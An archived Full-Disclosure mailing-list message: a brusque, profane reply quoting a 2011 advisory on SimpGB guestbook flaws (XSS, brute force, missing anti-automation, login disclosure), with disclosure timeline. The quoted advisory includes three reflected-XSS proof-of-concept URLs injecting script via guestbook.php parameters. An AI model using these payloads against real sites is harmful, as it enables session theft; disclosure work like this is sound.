lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <AANLkTimRTutNHxfZCMVFLVfj6drVOqi61w=9oiADLzFH@mail.gmail.com>
Date: Thu, 27 Jan 2011 02:09:10 +1100
From: laurent gaffie <laurent.gaffie@...il.com>
To: MustLive <mustlive@...security.com.ua>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Multiple vulnerabilities in SimpGB

Send your shitty stuff to bugtraq@...urityfocus.com

If it's not obvious, no one give a shit here, seriously.


2011/1/27 MustLive <mustlive@...security.com.ua>

> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&input_text=111111111111111111111111111111&preview=preview>
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview>
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&input_text=111111111111111111111111111111&preview=preview>
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ